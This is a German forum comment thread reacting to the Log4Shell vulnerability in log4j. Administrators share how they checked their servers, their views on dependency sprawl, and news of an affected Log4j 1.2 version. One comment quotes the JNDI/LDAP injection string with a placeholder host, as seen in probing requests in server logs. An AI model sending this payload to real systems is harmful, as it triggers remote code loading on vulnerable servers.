News Log4Shell: Sicherheitslücke in log4j für Java hält die IT-Welt in Atem

[Poati]

Das Statement bzgl. der eigenen Infrastruktur finde ich löblich.

Hatte jetzt persönlich auch ne Menge Zeit damit verbracht, um mir da einen Überblick zu verschaffen. Bin selbst in der Administration tätig. In der Rolle stellte ich dann schnell fest, dass ich es direkt gar nicht sicher für alle Systeme sagen konnte. Was weiß ich schon, welche Bibliotheken Softwareprodukt XY so benutzt. Das sind heutzutage in der Regel erstmal unzählige. Notwendigkeit kann man sicherlich oft hinterfragen.

Ich war jedenfalls froh um jeden (Web-)Server, die wir nicht mehr im eigenen Netz betreiben.

 

[Joshinator]

In den Logfiles auf meinem Server hatte ich Freitag gut 50 Requests die fleißig getestet haben.
Habe dann trotzdem erstmal 20min lang geguckt ob das nicht durch irgendeine Dependency der 7ten Ebene irgendwo läuft.

Am Ende immer die gleiche Geschichte, Software wird immer komplexer und vernetzter.
Vergeht gefühlt kein Monat indem man nicht von Paketmanager XYZ hört wo eine Paket kompromittiert wurde. Bei log4j war es immerhin nur fahrlässige Programmierung.
Aber wenn man mal guckt welche Software und welche Firmen davon alles betroffen sind/war, hatte irgendwie erwartet das Tech-Riesen dagegen besser gewappnet wären oder mehr Sicherheitsrichtlinien haben.

Was mich aber enorm überrascht hat, Alibaba Cloud hat die ganze Sache an Apache gemeldet.
Hätte vom "bösem China" erwartet das sowas unter Verschluss gehalten wird damit man es selbst einfacher hat um Code remote auszuführen. Ist wohl doch nicht alles so schwarz und weiß.

 

[Yuuri]

Ach ja, das geliebte "Open Source ist sicher, weil jeder drüber schaut". Finds aber abenteuerlich, dass ein PoC bereits seit neun Monaten auf Github liegt und erst jetzt was passiert... Da muss wohl jemand ordentlich Daten haben abfließen lassen.

Aber wenn man mal guckt welche Software und welche Firmen davon alles betroffen sind/war, hatte irgendwie erwartet das Tech-Riesen dagegen besser gewappnet wären oder mehr Sicherheitsrichtlinien haben.

In welchen Firmen wird denn auf die Dependencies geachtet? Da heißt es, dass es "laufen muss". Nicht mehr, nicht weniger. Die Qualität der Arbeit ist doch das Allerletzte, was geprüft wird. Hauptsache ich kann anfangen zu verkaufen. Und wenn ich da ne "Schleife" durch Copy'n'Paste hinbügel...

Und dass große Firmen sich genauso wie kleine Firmen drum scheren, sollte doch eigentlich spätestens seit dem OpenSSL-Desaster bekannt sein...

Google ist da etwas dabei, aber die paar Entwickler, die an Project Zero arbeiten, sind ein Fliegenschiss demgegenüber, was täglich erarbeitet wird. Zumal die Ausrichtung auch etwas fragwürdig ist. Statt permanent Lücken in 0815 Anwendersoftware zu finden, sollten sie vielleicht mal lieber an infrastrukturkritischer Software und Libs Hand anlegen. Damit wäre wirklich allen geholfen...

 

[Steffen]

Wenn die Suchbegriffe der User geloggt werden, dann sollte das doch verwundbar sein, oder?

Soweit ich weiß, hat Elasticsearch out-of-the-box kein Query-Log und konfiguriert habe ich auch keins.

 

[honky-tonk]

potenzielle Angreifer auf Elasticsearch nicht direkt zugreifen können, sondern dies nur indirekt über die Suchfunktionen des CMS oder XenForo geschieht

könnte man ggf durch einen angepasste titel zeile in einem neuen foren post ausnutzen, falls diese während der indizierung geloggt werden.

...aber nur ne vermutung

 

[DaysShadow]

@Reuter Quelle des Bildes? Oder dein eigenes Werk?

 

[Joshinator]

In welchen Firmen wird denn auf die Dependencies geachtet?

Von so ein paar Namen auf dieser Liste hatte ich nunmal mehr erwartet. Man muss ja nicht jede Dependency checken, aber das sowas einfach durch ne WAF bei denen kommt?

Vielleicht auch einfach ein Einstellungsproblem wo ich naiverweise denke das solche Mrd-Konzerne wesentlich mehr acht auf Code & Sicherheit legen als irgendwelche mittelständische Unternehmen mit 4 Mitarbeitern.

 

[MR2007]

Wenn man sich als "Unabhängiges Tech-Magazin. News und Tests zu Smartphones, Tablets, PC-Hardware, Software und IT." bezeichnet erwarte ich sowas.

Naja, mal ganz naiv gesagt, wer irgendeine Art von Infrastruktur betreibt, wird bestimmt (hoffentlich) nicht ComputerBase als erste/einzige Anlaufstelle über aktuelle und sicherheitsrelevante IT-News haben. CB ist jetzt nicht gerade bekannt für einen redaktionellen Schwerpunkt auf IT-Security.

Konnte selbst über das Wochenende nicht tätig werden und habe erst heute morgen meine eigenen Server überprüft, ob log4j irgendwo im Einsatz ist (zum Glück nicht). Aber sonst war das einzig auffällige nur, dass ich über die letzten 3 Tage soviele SSH Bans hatte, wie sonst im Zeitraum von 2 Wochen. Da haben wohl ein paar Botnetze zugelegt.

 

[foo_1337]

Ach ja, das geliebte "Open Source ist sicher, weil jeder drüber schaut". Finds aber abenteuerlich, dass ein PoC bereits seit neun Monaten auf Github liegt und erst jetzt was passiert... Da muss wohl jemand ordentlich Daten haben abfließen lassen.

Da ging es um CVE-2019-17571

 

[sikarr]

wird bestimmt (hoffentlich) nicht ComputerBase als erste/einzige Anlaufstelle über aktuelle und sicherheitsrelevante IT-News haben

so wars ja auch nicht gemeint, aber diese Lücke schlägt ja nun doch größere Wellen, und ich denke das auch ein CB darauf bedacht ist seine Nutzerbasis zu vergrößern. Wie gesagt es muss ja keine Wissenschaftliche Abhandlung sein und ein "Heise oder Spiegel berichtet" mit Quellenverweis reicht doch.

 

[psyabit]

Ging an mir vorbei. In nmap schon verfügbar? Zuhause gleich mal die Server Offline nehmen…

 

[sikarr]

Vielleicht auch einfach ein Einstellungsproblem wo ich naiverweise denke das solche Mrd-Konzerne wesentlich mehr acht auf Code & Sicherheit legen als irgendwelche mittelständische Unternehmen mit 4 Mitarbeitern.

Das du dich da mal nicht irrst, gerade bei denen dauert sowas ewig bis das durch deren Prozesse durch ist. Wo war das noch wo ein Konzern einen Apache uralt Server betrieb?

 

[Crowbar]

Hätte vom "bösem China" erwartet das sowas unter Verschluss gehalten wird damit man es selbst einfacher hat um Code remote auszuführen. Ist wohl doch nicht alles so schwarz und weiß.

Ich bewundere deine Naivität. Chinesische Unternehmen sind gesetzlich verpflichtet, erkannte Sicherheitslücken innerhalb kurzer zeitlicher Fristen einem bestimmten Ministerium zu melden, was die wiederum mit diesen Informationen anstellen kannst du dir hoffentlich denken. Die benötigen für ihre staatlichen Exploit-Kits gar kein reverse engineering oder Quelltextanalyse, die erhalten die O-days frei Haus.

 

[Bunhy]

Entgegen der aktuellen Meldungen und auch der News hier ist wohl auch Log4J 1.2 betroffen. Nur weniger kritisch, da nicht in der default Einstellung: https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126

Sollte jedoch der JMS Appender genutzt werden, ist die Sicherheitslücke aber genauso gegeben.

Edit: Es gibt nun auch ein offizielles CVE von Apache dazu, das es bestätigt:
https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx

 

[holdes]

Mal sehen wann ich wieder schlafen darf. Diverse Produkte durchpatchen und wenn der Hersteller nicht liefert selbst Workarounds finden, Freude pur und das seit Tagen. Irgendwann hab ich aber auch mal Rente .

 

[Amaoto]

@Reuter Quelle des Bildes? Oder dein eigenes Werk?

Ganz ursprünglich von xkcd: https://xkcd.com/2347/

 

[Joshinator]

Chinesische Unternehmen in China gesetzlich verpflichtet, erkannte Sicherheitslücken innerhalb kurzer zeitlicher Fristen einem bestimmten Ministerium zu melden

Genau mein Punkt, wenn China von so einem 0 Day seit Monaten bescheid weiß: wieso den Hafen aufmachen und 0 Day No. 3292471 für schlechte Zeiten beiseite legen

Ich hätte nicht erwartet das sich eine chinesische Firma mit sowas meldet statt einfach still zu bleiben.
Warum die jetzt Log4Shell veröffentlicht haben wir sich jeder selbst ausmalen.

 

[Pankrat]

Bei uns auf den Servern gingen die Probing Angriffe Freitag Vormittag los (also bspw. Requests mit ${jndi:ldap://<IP>/} im User Agent oder URL path. Zu dem Zeitpunkt hatten wir gerade erst angefangen zu schauen, welche Systeme potentiell betroffen sind. Wenn man jetzt noch einen angreifbaren Server findet, dürfte der schon eine Weile komprimittiert sein. Bei uns läuft glücklicherweise nicht allzu viel auf Java, aber das Confluence, JIRA und ein paar andere Services nur deswegen nicht betroffen sind, weil die eine EOL Version benutzen, fühlt sich auch nicht so toll an.

 

[floh667]

wie sieht es denn da bezüglich routern aus? Aprich AVM und co? Sind solche Geräte ggf. auch davon betroffen?

 

[leipziger1979]

Und wie relevant ist das für den "normalen" Endanwender?
Ich schätzte mal 0.

Angreifer könnten über die Schwachstelle auf dem Zielsystem eigenen Programmcode ausführen und so den Server kompromittieren.

Soweit ich das jetzt verstanden habe interpretiert der Logger eventuell ein nachladen von bösem Code aus dem Internet.
Doch wenn das System nicht direkt am Internet hängt muss man sich, wie immer, erstmal was einfangen damit das ausgelöst wird.